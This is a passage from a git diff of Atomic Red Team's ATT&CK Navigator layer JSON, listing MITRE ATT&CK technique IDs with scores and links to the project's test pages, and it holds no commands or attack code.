aster/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 9124ae71..87287bd4 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/m